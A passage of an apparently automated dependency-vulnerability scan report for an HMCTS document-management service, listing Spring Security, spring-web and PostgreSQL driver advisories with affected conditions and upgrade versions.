  5. The application must be using @PreFilter, @PostFilter, @PreAuthorize, or @PostAuthorize on those wrapped objects

Remediation

Upgrade org.springframework.security:spring-security-config to version 6.3.2 or higher.

References

medium severity

Incorrect Authorization

  • Vulnerable module: org.springframework.security:spring-security-core
  • Introduced through: org.springframework.security:spring-security-core@versions.springSecurity

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.security:spring-security-core@versions.springSecurity
    Remediation: Upgrade to org.springframework.security:spring-security-core@2.0.0.

Overview

org.springframework.security:spring-security-core is a package that provides security services for the Spring IO Platform.

Affected versions of this package are vulnerable to Incorrect Authorization when using @EnableMethodSecurity on parameterized types or methods. The method annotation finding logic in findClosestMethodAnnotations() does not properly traverse the inheritance of method security annotations, allowing authorization bypass if a method security annotation is used on a parameterized superclass, interface, or overridden method but not on the target method.

If any of the following are true the application is not vulnerable:

  1. Method security annotations (@EnableMethodSecurity) are not in use.

  2. Method security annotations are in use but not for parameterized types or methods.

  3. All method security annotations are attached to target methods.

Remediation

Upgrade org.springframework.security:spring-security-core to version 6.4.4 or higher.

References

medium severity

Cryptographic Weakness

  • Vulnerable module: org.springframework.security:spring-security-core
  • Introduced through: org.springframework.security:spring-security-core@versions.springSecurity

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.security:spring-security-core@versions.springSecurity
    Remediation: Upgrade to org.springframework.security:spring-security-core@2.0.0.

Overview

org.springframework.security:spring-security-core is a package that provides security services for the Spring IO Platform.

Affected versions of this package are vulnerable to Cryptographic Weakness. Spring Security was found to be a fixed null initialization vector with CBC Mode in the implementation of the queryable text encryptor. A malicious user with access to the data that has been encrypted using such an encryptor may be able to derive the unencrypted values using a dictionary attack.

Remediation

Upgrade org.springframework.security:spring-security-core to version 5.3.2.RELEASE, 5.2.4.RELEASE, 5.1.10.RELEASE, 5.0.16.RELEASE, 4.2.16.RELEASE or higher.

References

medium severity

Authorization Bypass

  • Vulnerable module: org.springframework.security:spring-security-config
  • Introduced through: org.springframework.security:spring-security-config@versions.springSecurity

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.security:spring-security-config@versions.springSecurity
    Remediation: Upgrade to org.springframework.security:spring-security-config@5.7.14.

Overview

org.springframework.security:spring-security-config is a security configuration package for Spring Framework.

Affected versions of this package are vulnerable to Authorization Bypass due to the use of String.toLowerCase() and String.toUpperCase() that have Locale dependent exceptions, which results in authorization rules not working properly.

Remediation

Upgrade org.springframework.security:spring-security-config to version 5.7.14, 5.8.16, 6.2.8, 6.3.5 or higher.

References

medium severity

Access Restriction Bypass

  • Vulnerable module: org.springframework.security:spring-security-core
  • Introduced through: org.springframework.security:spring-security-core@versions.springSecurity

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.security:spring-security-core@versions.springSecurity
    Remediation: Upgrade to org.springframework.security:spring-security-core@2.0.7.RELEASE.

Overview

org.springframework.security:spring-security-core is a package that provides security services for the Spring IO Platform.

Affected versions of this package are vulnerable to Access Restriction Bypass. Remote attackers can bypass intended security restrictions and execute untrusted code by (1) serializing a java.lang.Proxy instance and using InvocationHandler, or (2) accessing internal AOP interfaces, as demonstrated using deserialization of a DefaultListableBeanFactory instance to execute arbitrary commands via the java.lang.Runtime class.

Remediation

Upgrade org.springframework.security:spring-security-core to version 2.0.7.RELEASE, 3.0.6.RELEASE or higher.

References

medium severity

Authorization Bypass

  • Vulnerable module: org.springframework.security:spring-security-core
  • Introduced through: org.springframework.security:spring-security-core@versions.springSecurity

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.security:spring-security-core@versions.springSecurity
    Remediation: Upgrade to org.springframework.security:spring-security-core@5.7.14.

Overview

org.springframework.security:spring-security-core is a package that provides security services for the Spring IO Platform.

Affected versions of this package are vulnerable to Authorization Bypass due to the use of String.toLowerCase() and String.toUpperCase() that have Locale dependent exceptions, which results in authorization rules not working properly.

Remediation

Upgrade org.springframework.security:spring-security-core to version 5.7.14, 5.8.16, 6.2.8, 6.3.5 or higher.

References

medium severity

Authorization Bypass

  • Vulnerable module: org.springframework.security:spring-security-oauth2-client
  • Introduced through: org.springframework.security:spring-security-oauth2-client@versions.springSecurity

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.security:spring-security-oauth2-client@versions.springSecurity
    Remediation: Upgrade to org.springframework.security:spring-security-oauth2-client@5.7.14.

Overview

Affected versions of this package are vulnerable to Authorization Bypass due to the use of String.toLowerCase() and String.toUpperCase() that have Locale dependent exceptions, which results in authorization rules not working properly.

Remediation

Upgrade org.springframework.security:spring-security-oauth2-client to version 5.7.14, 5.8.16, 6.2.8, 6.3.5 or higher.

References

medium severity

Authorization Bypass

  • Vulnerable module: org.springframework.security:spring-security-web
  • Introduced through: org.springframework.security:spring-security-web@versions.springSecurity

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.security:spring-security-web@versions.springSecurity
    Remediation: Upgrade to org.springframework.security:spring-security-web@5.7.14.

Overview

org.springframework.security:spring-security-web is a package within Spring Security that provides security services for the Spring IO Platform.

Affected versions of this package are vulnerable to Authorization Bypass due to the use of String.toLowerCase() and String.toUpperCase() that have Locale dependent exceptions, which results in authorization rules not working properly.

Remediation

Upgrade org.springframework.security:spring-security-web to version 5.7.14, 5.8.16, 6.2.8, 6.3.5 or higher.

References

medium severity

Session Fixation

  • Vulnerable module: org.springframework.security:spring-security-config
  • Introduced through: org.springframework.security:spring-security-config@versions.springSecurity

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.security:spring-security-config@versions.springSecurity
    Remediation: Upgrade to org.springframework.security:spring-security-config@3.0.0.RELEASE.

Overview

org.springframework.security:spring-security-config is a security configuration package for Spring Framework.

Affected versions of this package are vulnerable to Session Fixation due to the logout functionality not properly clearing the security context when using serialized versions. Additionally, it is not possible to explicitly save an empty security context to the HttpSessionSecurityContextRepository. This allows users to stay authenticated after a logout.

NOTE: Applications are only vulnerable if any of the following conditions are true:

  • The SecurityContextHolderFilter or requireExplicitSave(true) is in use with logout support for serialized sessions, and invalidateHttpSession(false).

  • Users are logged out manually by saving an empty SecurityContext into the HttpSessionSecurityContextRepository.

  • A custom SecurityContextRepository is in use that does not rely on the HttpSession.

Remediation

Upgrade org.springframework.security:spring-security-config to version 5.7.8, 5.8.3, 6.0.3 or higher.

References

medium severity

Session Fixation

  • Vulnerable module: org.springframework.security:spring-security-web
  • Introduced through: org.springframework.security:spring-security-web@versions.springSecurity

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.security:spring-security-web@versions.springSecurity
    Remediation: Upgrade to org.springframework.security:spring-security-web@3.0.0.RELEASE.

Overview

org.springframework.security:spring-security-web is a package within Spring Security that provides security services for the Spring IO Platform.

Affected versions of this package are vulnerable to Session Fixation due to the logout functionality not properly clearing the security context when using serialized versions. Additionally, it is not possible to explicitly save an empty security context to the HttpSessionSecurityContextRepository. This allows users to stay authenticated after a logout.

NOTE: Applications are only vulnerable if any of the following conditions are true:

  • The SecurityContextHolderFilter or requireExplicitSave(true) is in use with logout support for serialized sessions, and invalidateHttpSession(false).

  • Users are logged out manually by saving an empty SecurityContext into the HttpSessionSecurityContextRepository.

  • A custom SecurityContextRepository is in use that does not rely on the HttpSession.

Remediation

Upgrade org.springframework.security:spring-security-web to version 5.7.8, 5.8.3, 6.0.3 or higher.

References

medium severity

Improper Authentication

  • Vulnerable module: org.springframework.security:spring-security-core
  • Introduced through: org.springframework.security:spring-security-core@versions.springSecurity

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.security:spring-security-core@versions.springSecurity
    Remediation: Upgrade to org.springframework.security:spring-security-core@2.0.7.RELEASE.

Overview

org.springframework.security:spring-security-core Race condition in the RunAsManager mechanism in VMware SpringSource Spring Security before 2.0.7 and 3.0.x before 3.0.6 stores the Authentication object in the shared security context, which allows attackers to gain privileges via a crafted thread.

References

medium severity

Access Restriction Bypass

  • Vulnerable module: org.springframework.security:spring-security-config
  • Introduced through: org.springframework.security:spring-security-config@versions.springSecurity

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.security:spring-security-config@versions.springSecurity
    Remediation: Upgrade to org.springframework.security:spring-security-config@3.0.0.RELEASE.

Overview

org.springframework.security:spring-security-config is a security configuration package for Spring Framework.

Affected versions of this package are vulnerable to Access Restriction Bypass. It does not consider URL path parameters when processing security constraints. By adding a URL path parameter with special encodings, an attacker may be able to bypass a security constraint.

Remediation

Upgrade org.springframework.security:spring-security-config to version 4.1.5.RELEASE, 4.2.4.RELEASE, 5.0.3.RELEASE or higher.

References

medium severity

Access Restriction Bypass

  • Vulnerable module: org.springframework.security:spring-security-core
  • Introduced through: org.springframework.security:spring-security-core@versions.springSecurity

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.security:spring-security-core@versions.springSecurity
    Remediation: Upgrade to org.springframework.security:spring-security-core@2.0.6.RELEASE.

Overview

org.springframework.security:spring-security-core is a package that provides security services for the Spring IO Platform.

Affected versions of this package are vulnerable to Access Restriction Bypass. Spring Security allows remote attackers to bypass security constraints via a path parameter.

Remediation

Upgrade org.springframework.security:spring-security-core to version 2.0.6.RELEASE, 3.0.4.RELEASE or higher.

References

medium severity

Information Exposure

  • Vulnerable module: org.springframework.security:spring-security-core
  • Introduced through: org.springframework.security:spring-security-core@versions.springSecurity

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.security:spring-security-core@versions.springSecurity
    Remediation: Upgrade to org.springframework.security:spring-security-core@2.0.8.RELEASE.

Overview

org.springframework.security:spring-security-core is a package that provides security services for the Spring IO Platform.

Affected versions of this package are vulnerable to Information Exposure. DaoAuthenticationProvider in VMware SpringSource Spring Security does not check the password if the user is not found, which makes the response delay shorter and might allow remote attackers to enumerate valid usernames via a series of login requests.

Remediation

Upgrade org.springframework.security:spring-security-core to version 2.0.8.RELEASE, 3.0.8.RELEASE, 3.1.3.RELEASE or higher.

References

medium severity

Integer Overflow or Wraparound

  • Vulnerable module: org.springframework.security:spring-security-core
  • Introduced through: org.springframework.security:spring-security-core@versions.springSecurity

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.security:spring-security-core@versions.springSecurity
    Remediation: Upgrade to org.springframework.security:spring-security-core@2.0.0.

Overview

org.springframework.security:spring-security-core is a package that provides security services for the Spring IO Platform.

Affected versions of this package are vulnerable to Integer Overflow or Wraparound when using the BCrypt class with the maximum work factor (31). In such a case, the encoder does not perform any salt rounds due to the overflow.

Note:

The default settings are not affected by this CVE.

Remediation

Upgrade org.springframework.security:spring-security-core to version 5.4.11 or higher.

References

medium severity

Denial of Service (DoS)

  • Vulnerable module: org.springframework.security:spring-security-oauth2-client
  • Introduced through: org.springframework.security:spring-security-oauth2-client@versions.springSecurity

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.security:spring-security-oauth2-client@versions.springSecurity
    Remediation: Upgrade to org.springframework.security:spring-security-oauth2-client@5.0.0.RELEASE.

Overview

Affected versions of this package are vulnerable to Denial of Service (DoS) via sending multiple requests that initiate the Authorization Request and Authorization Code Grant, which may lead to resource exhaustion.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade org.springframework.security:spring-security-oauth2-client to version 5.5.1, 5.4.7, 5.3.10.RELEASE, 5.2.11.RELEASE or higher.

References

medium severity

Access Restriction Bypass

  • Vulnerable module: org.springframework.security:spring-security-web
  • Introduced through: org.springframework.security:spring-security-web@versions.springSecurity

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.security:spring-security-web@versions.springSecurity
    Remediation: Upgrade to org.springframework.security:spring-security-web@3.0.4.RELEASE.

Overview

org.springframework.security:spring-security-web is a package within Spring Security that provides security services for the Spring IO Platform.

Affected versions of this package are vulnerable to Access Restriction Bypass. Spring Security allows remote attackers to bypass security constraints via a path parameter.

Remediation

Upgrade org.springframework.security:spring-security-web to version 3.0.4.RELEASE or higher.

References

medium severity

Access Restriction Bypass

  • Vulnerable module: org.springframework.security:spring-security-web
  • Introduced through: org.springframework.security:spring-security-web@versions.springSecurity

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.security:spring-security-web@versions.springSecurity
    Remediation: Upgrade to org.springframework.security:spring-security-web@3.0.0.RELEASE.

Overview

org.springframework.security:spring-security-web is a package within Spring Security that provides security services for the Spring IO Platform.

Affected versions of this package are vulnerable to Access Restriction Bypass. It does not consider URL path parameters when processing security constraints. By adding a URL path parameter with special encodings, an attacker may be able to bypass a security constraint.

Remediation

Upgrade org.springframework.security:spring-security-web to version 4.1.5.RELEASE, 4.2.4.RELEASE, 5.0.3.RELEASE or higher.

References

medium severity

Information Exposure

  • Vulnerable module: org.postgresql:postgresql
  • Introduced through: org.postgresql:postgresql@versions.postgresql

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.postgresql:postgresql@versions.postgresql
    Remediation: Upgrade to org.postgresql:postgresql@9.2-1002-jdbc4.

Overview

org.postgresql:postgresql is a Java JDBC 4.2 (JRE 8+) driver for PostgreSQL database.

Affected versions of this package are vulnerable to Information Exposure in the pgjdbc driver, which writes to the operating system's shared temp directory when the InputStream to either PreparedStatement.setText(int, InputStream) or PreparedStatemet.setBytea(int, InputStream) is larger than 2K. The temporary file is readable by other users. This is the default system behavior on Unix systems but not on MacOS.

NOTE: This vulnerability is only fixed for JDK 1.7. Systems using JDK 1.6 or below can work around the vulnerability by setting the environment variable java.io.tmpdir to a non-world-readable location.

Remediation

Upgrade org.postgresql:postgresql to version 42.2.27, 42.3.8, 42.4.3, 42.5.1 or higher.

References

medium severity

HTTP Response Splitting

  • Vulnerable module: org.springframework:spring-web
  • Introduced through: org.springframework.cloud:spring-cloud-starter-openfeign@4.3.0, org.springframework.boot:spring-boot-starter-web@4.0.0-M2 and others

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.cloud:spring-cloud-starter-openfeign@4.3.0 org.springframework:spring-web@6.2.7
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.boot:spring-boot-starter-web@4.0.0-M2 org.springframework.boot:spring-boot-http-converter@4.0.0-M2 org.springframework:spring-web@6.2.7
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.boot:spring-boot-starter-web@4.0.0-M2 org.springframework.boot:spring-boot-webmvc@4.0.0-M2 org.springframework:spring-web@6.2.7
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springdoc:springdoc-openapi-starter-webmvc-ui@2.8.12 org.springdoc:springdoc-openapi-starter-webmvc-api@2.8.12 org.springframework:spring-webmvc@7.0.0-M8 org.springframework:spring-web@6.2.7
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.boot:spring-boot-starter-web@4.0.0-M2 org.springframework.boot:spring-boot-webmvc@4.0.0-M2 org.springframework:spring-webmvc@7.0.0-M8 org.springframework:spring-web@6.2.7
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.boot:spring-boot-starter-data-rest@4.0.0-M2 org.springframework.boot:spring-boot-data-rest@4.0.0-M2 org.springframework.boot:spring-boot-jackson@4.0.0-M2 org.springframework:spring-web@6.2.7
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.boot:spring-boot-starter-data-rest@4.0.0-M2 org.springframework.boot:spring-boot-starter-jackson@4.0.0-M2 org.springframework.boot:spring-boot-jackson@4.0.0-M2 org.springframework:spring-web@6.2.7
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.boot:spring-boot-starter-web@4.0.0-M2 org.springframework.boot:spring-boot-starter-jackson@4.0.0-M2 org.springframework.boot:spring-boot-jackson@4.0.0-M2 org.springframework:spring-web@6.2.7
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.boot:spring-boot-starter-web@4.0.0-M2 org.springframework.boot:spring-boot-webmvc@4.0.0-M2 org.springframework.boot:spring-boot-http-converter@4.0.0-M2 org.springframework:spring-web@6.2.7
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.boot:spring-boot-starter-data-rest@4.0.0-M2 org.springframework.boot:spring-boot-starter-webmvc@4.0.0-M2 org.springframework.boot:spring-boot-http-converter@4.0.0-M2 org.springframework:spring-web@6.2.7
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.boot:spring-boot-starter-web@4.0.0-M2 org.springframework.boot:spring-boot-webmvc@4.0.0-M2 org.springframework.boot:spring-boot-servlet@4.0.0-M2 org.springframework:spring-web@6.2.7
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.boot:spring-boot-starter-data-rest@4.0.0-M2 org.springframework.boot:spring-boot-data-rest@4.0.0-M2 org.springframework.boot:spring-boot-webmvc@4.0.0-M2 org.springframework:spring-web@6.2.7
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.boot:spring-boot-starter-data-rest@4.0.0-M2 org.springframework.boot:spring-boot-starter-webmvc@4.0.0-M2 org.springframework.boot:spring-boot-webmvc@4.0.0-M2 org.springframework:spring-web@6.2.7
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.cloud:spring-cloud-starter-openfeign@4.3.0 org.springframework.cloud:spring-cloud-openfeign-core@4.3.0 io.github.openfeign:feign-form-spring@13.6 org.springframework:spring-web@6.2.7
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.boot:spring-boot-starter-data-rest@4.0.0-M2 org.springframework.boot:spring-boot-data-rest@4.0.0-M2 org.springframework.boot:spring-boot-webmvc@4.0.0-M2 org.springframework:spring-webmvc@7.0.0-M8 org.springframework:spring-web@6.2.7
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.boot:spring-boot-starter-data-rest@4.0.0-M2 org.springframework.boot:spring-boot-starter-webmvc@4.0.0-M2 org.springframework.boot:spring-boot-webmvc@4.0.0-M2 org.springframework:spring-webmvc@7.0.0-M8 org.springframework:spring-web@6.2.7
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.boot:spring-boot-starter-data-rest@4.0.0-M2 org.springframework.boot:spring-boot-data-rest@4.0.0-M2 org.springframework.data:spring-data-rest-webmvc@5.0.0-M5 org.springframework:spring-webmvc@7.0.0-M8 org.springframework:spring-web@6.2.7
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.boot:spring-boot-starter-data-rest@4.0.0-M2 org.springframework.boot:spring-boot-starter-webmvc@4.0.0-M2 org.springframework.boot:spring-boot-starter-jackson@4.0.0-M2 org.springframework.boot:spring-boot-jackson@4.0.0-M2 org.springframework:spring-web@6.2.7
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.boot:spring-boot-starter-data-rest@4.0.0-M2 org.springframework.boot:spring-boot-data-rest@4.0.0-M2 org.springframework.boot:spring-boot-webmvc@4.0.0-M2 org.springframework.boot:spring-boot-http-converter@4.0.0-M2 org.springframework:spring-web@6.2.7
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.boot:spring-boot-starter-data-rest@4.0.0-M2 org.springframework.boot:spring-boot-starter-webmvc@4.0.0-M2 org.springframework.boot:spring-boot-webmvc@4.0.0-M2 org.springframework.boot:spring-boot-http-converter@4.0.0-M2 org.springframework:spring-web@6.2.7
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.boot:spring-boot-starter-data-rest@4.0.0-M2 org.springframework.boot:spring-boot-data-rest@4.0.0-M2 org.springframework.boot:spring-boot-webmvc@4.0.0-M2 org.springframework.boot:spring-boot-servlet@4.0.0-M2 org.springframework:spring-web@6.2.7
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.boot:spring-boot-starter-data-rest@4.0.0-M2 org.springframework.boot:spring-boot-starter-webmvc@4.0.0-M2 org.springframework.boot:spring-boot-webmvc@4.0.0-M2 org.springframework.boot:spring-boot-servlet@4.0.0-M2 org.springframework:spring-web@6.2.7
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.boot:spring-boot-starter-web@4.0.0-M2 org.springframework.boot:spring-boot-starter-tomcat@4.0.0-M2 org.springframework.boot:spring-boot-tomcat@4.0.0-M2 org.springframework.boot:spring-boot-web-server@4.0.0-M2 org.springframework:spring-web@6.2.7
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.boot:spring-boot-starter-data-rest@4.0.0-M2 org.springframework.boot:spring-boot-data-rest@4.0.0-M2 org.springframework.data:spring-data-rest-webmvc@5.0.0-M5 org.springframework.data:spring-data-rest-core@5.0.0-M5 org.springframework.hateoas:spring-hateoas@3.0.0-M4 org.springframework:spring-web@6.2.7
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.boot:spring-boot-starter-data-rest@4.0.0-M2 org.springframework.boot:spring-boot-starter-webmvc@4.0.0-M2 org.springframework.boot:spring-boot-starter-tomcat@4.0.0-M2 org.springframework.boot:spring-boot-tomcat@4.0.0-M2 org.springframework.boot:spring-boot-web-server@4.0.0-M2 org.springframework:spring-web@6.2.7

Overview

org.springframework:spring-web is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.

Affected versions of this package are vulnerable to HTTP Response Splitting via the Content-Disposition header where the filename parameter value could contain non-printable characters, causing parsing issues for HTTP clients. An attacker can cause the download of files containing malicious commands by injecting content into the response.

Notes:

  1. This is only exploitable if the header is prepared with org.springframework.http.ContentDisposition, the filename is set via ContentDisposition.Builder#filename(String, Charset), the value is derived from unsanitized user input, and the attacker can inject malicious content into the downloaded response.

  2. The vulnerability was also fixed in the 6.0.29 commercial version.

Remediation

Upgrade org.springframework:spring-web to version 6.1.21, 6.2.8 or higher.

References

medium severity

Privilege Escalation

  • Vulnerable module: org.springframework.security:spring-security-core
  • Introduced through: org.springframework.security:spring-security-core@versions.springSecurity

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.security:spring-security-core@versions.springSecurity
    Remediation: Upgrade to org.springframework.security:spring-security-core@5.2.9.RELEASE.

Overview

org.springframework.security:spring-security-core is a package that provides security services for the Spring IO Platform.

Affected versions of this package are vulnerable to Privilege Escalation. It fails to save the SecurityContext if it has changed more than once in a single request. The SecurityContext can fail to save to the HttpSession if a developer changes the SecurityContext twice in a single request when both of the following conditions are met: First the developer must change the SecurityContext before the HttpResponse is committed and then the HttpResponse must be committed before the SecurityContextPersistenceFilter completes. Then the developer must attempt to change the SecurityContext again before the SecurityContextPersistenceFilter completes. A malicious user cannot cause the bug to happen (it must be programmed in). However, if the application's intent is to only allow the user to run with elevated privileges in a small portion of the application, the bug can be leveraged to extend those privileges to the rest of the application.

Remediation

Upgrade org.springframework.security:spring-security-core to version 5.4.4, 5.3.8.RELEASE, 5.2.9.RELEASE or higher.

References

medium severity

Arbitrary Code Execution

  • Vulnerable module: org.springframework.security:spring-security-core
  • Introduced through: org.springframework.security:spring-security-core@versions.springSecurity

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.security:spring-security-core@versions.springSecurity
    Remediation: Upgrade to org.springframework.security:spring-security-core@2.0.7.RELEASE.

Overview

org.springframework.security:spring-security-core is a package that provides security services for the Spring IO Platform.

Affected versions of this package are vulnerable to Arbitrary Code Execution. CRLF injection vulnerability in the logout functionality in VMware SpringSource Spring Security before 2.0.7 and 3.0.x before 3.0.6 allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via the spring-security-redirect parameter.

Remediation

Upgrade org.springframework.security:spring-security-core to version 2.0.7.RELEASE, 3.0.6.RELEASE or higher.

References

medium severity

Arbitrary Code Execution

  • Vulnerable module: org.springframework.security:spring-security-web
  • Introduced through: org.springframework.security:spring-security-web@versions.springSecurity

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.security:spring-security-web@versions.springSecurity
    Remediation: Upgrade to org.springframework.security:spring-security-web@3.0.6.RELEASE.

Overview

org.springframework.security:spring-security-web is a package within Spring Security that provides security services for the Spring IO Platform.

Affected versions of this package are vulnerable to Arbitrary Code Execution. CRLF injection vulnerability in the logout functionality in VMware SpringSource Spring Security before 2.0.7 and 3.0.x before 3.0.6 allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via the spring-security-redirect parameter.

Remediation

Upgrade org.springframework.security:spring-security-web to version 3.0.6.RELEASE or higher.

References

medium severity

Authorization Bypass

  • Vulnerable module: org.springframework.security:spring-security-oauth2-jose
  • Introduced through: org.springframework.security:spring-security-oauth2-jose@versions.springSecurity

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.security:spring-security-oauth2-jose@versions.springSecurity
    Remediation: Upgrade to org.springframework.security:spring-security-oauth2-jose@5.0.0.RELEASE.

Overview

org.springframework.security:spring-security-oauth2-jose provides security services for the Spring IO Platform.

Affected versions of this package are vulnerable to Authorization Bypass via the JWT issuer validator. An attacker could fashion signed JWTs with the malicious issuer URL that may be granted for the honest issue. In order to be impacted, the same private key for an honest issuer and a malicious user must be used when signing JWTs.

Remediation

Upgrade org.springframework.security:spring-security-oauth2-jose to version 5.1.2.RELEASE or higher.

References

medium severity

Dual license: EPL-1.0, LGPL-2.1

  • Module: ch.qos.logback:logback-classic
  • Introduced through: org.springframework.boot:spring-boot-starter-validation@4.0.0-M2, org.springframework.boot:spring-boot-starter-actuator@4.0.0-M2 and others

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.boot:spring-boot-starter-validation@4.0.0-M2 org.springframework.boot:spring-boot-starter@4.0.0-M2 org.springframework.boot:spring-boot-starter-logging@4.0.0-M2 ch.qos.logback:logback-classic@1.5.18
